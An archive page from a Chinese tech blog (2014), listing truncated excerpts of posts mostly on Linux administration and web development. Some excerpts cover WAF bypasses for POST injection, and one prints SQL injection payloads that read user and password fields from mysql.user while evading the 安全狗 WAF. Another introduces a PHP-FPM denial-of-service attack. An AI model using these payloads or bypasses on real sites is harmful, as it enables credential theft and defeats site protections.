2014年5月

CentOS下使用iftop按IP查看网卡带宽使用情况

1、安装编译组件yum install -y gcc flex byacc libpcap ncurses ncurses-devel libpcap-devel tcpdump2、下载源码并编译安装 cd /usr/local/src wget http://www.ex-parrot.com/pdw/iftop/download/iftop-0.17.tar.gz tar xvf i...

memory   2014-05-23  暂无评论

WES7安装教程:使用Windows Embedded Standard 7代替windows 7

现在超级本使用非常普遍,基本都是配置了SSD固态磁盘,厂家一般都预装了windows 7系统。近期笔者入手一款超级本,自带24G SSD, windows 7 64位系统。但在使用中遇到这几个问题:1. 自带的windows 7占用磁盘空间超过了11GB, 随着使用系统盘空间会被耗尽占满,导致系统响应越来越慢2....

memory   2014-05-22  2 条评论

以双斜杠//开头的URL – 依赖协议的URL

不知道大家有没有见过下面这种 url 写法:<img src="//lvtao.net/img/logo.png">img 中的url是以双斜杠“//”开头的,这种写法有特殊的用途,它会判断当前的页面协议是http 还是 https 来决定请求 url 的协议。防止IE下出现“This Page Contains Both Secure and Non-Secure Items”...

memory   2014-05-20  2 条评论

谷歌总结移动网站开发25个建议:如何构建优秀的移动网站?

谷歌公司的研究人员聆听了119个小时用户对移动网站的抱怨,了解到构建移动网站的精髓。最近,来自谷歌公司和AnswerLab的研究人员主持了一场长达119小时的用户测试会议,他们每天都会让用户访问100个不同的移动网站,这些网站涉及 的行业范围非常广泛,比如零售行业,保险行业,或是新闻行业。参与测试的用户会把自己的使用感觉实时告诉研究人员。最后,谷歌公司的研究人员总结出了25 个要点,内容如下...

memory   2014-05-12  暂无评论

ngrok捕获和分析所有通道上的流量

ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。网络架构如下图所示:第一步:下载ngrok,网址:https://ngrok.com/ ,点击download(图1),然后选择自己所需的版本(我的是windows,图2)  图1 图2  第二步:进入http...

memory   2014-05-11  1 条评论

nginx+php-fpm性能参数优化原则

1.worker_processes 越大越好(一定数量后性能增加不明显)2.worker_cpu_affinity 所有cpu平分worker_processes 要比每个worker_processes 都跨cpu分配性能要好;不考虑php的执行,测试结果worker_processes数量是cpu核数的2倍性能最优3.unix domain socket(共享内存的方式)要比tcp网络...

memory   2014-05-09  暂无评论

如何从视觉上做好扁平化设计

去年,iOS 7的发布让更多的用户欣赏到了扁平化设计之美,更在业内掀起了一股扁平化设计潮流。扁平风格的一个优势在于它可以更加简单直接的将信息和事物的工作方式展示出来,减少认知障碍的产生。其简约、条理清晰以及更好地适应性让更多地人所接受和喜爱。那么,如何从视觉上把握好扁平化设计,不妨一起来看看腾讯CDC团队joy分享的一篇文章。 扁平化设计无疑是当前讨论最多,最火的设计形式,自ios7面世...

memory   2014-05-08  暂无评论

Linux/CentOS下恢复rm删除的文件

今天误删除了Centos服务器上的某个文件夹,找了下恢复,ext3grep,extundelete等,因为文件系统是ext4的,只能使用extundelete1. 安装依赖yum -y install e2fsprogs e2fsprogs-devel2. 去http://extundelete.sourceforge.net/下载extundelete-0.2.4.tar.bz2并安装ta...

memory   2014-05-08  暂无评论

开源、简单、安全的PHP开发框架

1. 程序文件组织| install/ /* 数据库文件、服务器Rewrite规则 */ | oldcms.sql /* 数据库文件 */ | rewrite.txt /* Rewrite规则(Apache,Nginx) */ | libs/ ...

memory   2014-05-08  暂无评论

轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。构建如下HTML表单:<!DOCTYPE html> <html> <head&g...

memory   2014-05-08  暂无评论

服务器安全狗POST SQL注入.

不知为何不拦POST的/!XXX/ id=1 and 1=2 union select 1,user,password from mysql.user limit 0,1 id=1200000 &nbsp;/*!union*//*!select*/(1),user,password from mysql.user limit 0,1 <?php $c...

memory   2014-05-08  暂无评论

Apache/nginx使用PHP-FPM或PHP-CGI拒绝服务漏洞攻击

使用标准cable/DSL连接,这种攻击可以使用标准的HTTP请求占满一台Linux web服务器的CPU和内存。这种攻击影响使用PHP-CGI或PHP-FPM(包含WordPress站点在内)解析PHP动态内容的Apache或者NGINX web服务器。另外,这种攻击制造的请求将会在攻击后的较长时间内继续占用服务器资源。本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!...

memory   2014-05-08  暂无评论

修改火狐浏览器FireFox打开新建标签页(即NewTab Page)的缩略图相关参数

  FireFox的打开新建标签页(即NewTab Page)默认只能显示3x3个网站缩略图,这9个自定义的网站,非常方便快捷,什么hao123的弱爆了,本人从未用过此类导航网站,曾经用过的也只是about:blank或者Google作为首页。   你只需在FireFox的地址栏输入"about:config",就出看到一个警告提示,点击确定,配置选项挺多,   我们在搜索中输入“newt...

memory   2014-05-06  暂无评论

原理:PHP合并多个JS和CSS文件,减少HTTP请求

HTML:<link rel="stylesheet" type="text/css" href="cssmin.php?get=base,style1,style2,global&path=css/&v=20131023" /> <script type="text/javascript" src="jsmin.php?get=jquery-1.6.4....

memory   2014-05-06  暂无评论

利用Data URL(data:image/jpg;base64,)将小图片生成数据流形式

先看一段代码:<img src="data:image/jpg;base64,iVBORw0KGgoAAAANSUhEUgAAAKAAAAAwCAMAAAChd4FcAAAAA3NCSVQICAjb4U/gAAACRlBMVEUAAADi6OSMjIxSUlIrXja5trg8rFEDRhErokJ8w4pJrVxmZmYERRIinTn++P07nk/X0Naww7Stra0pdTj...

memory   2014-05-06  4 条评论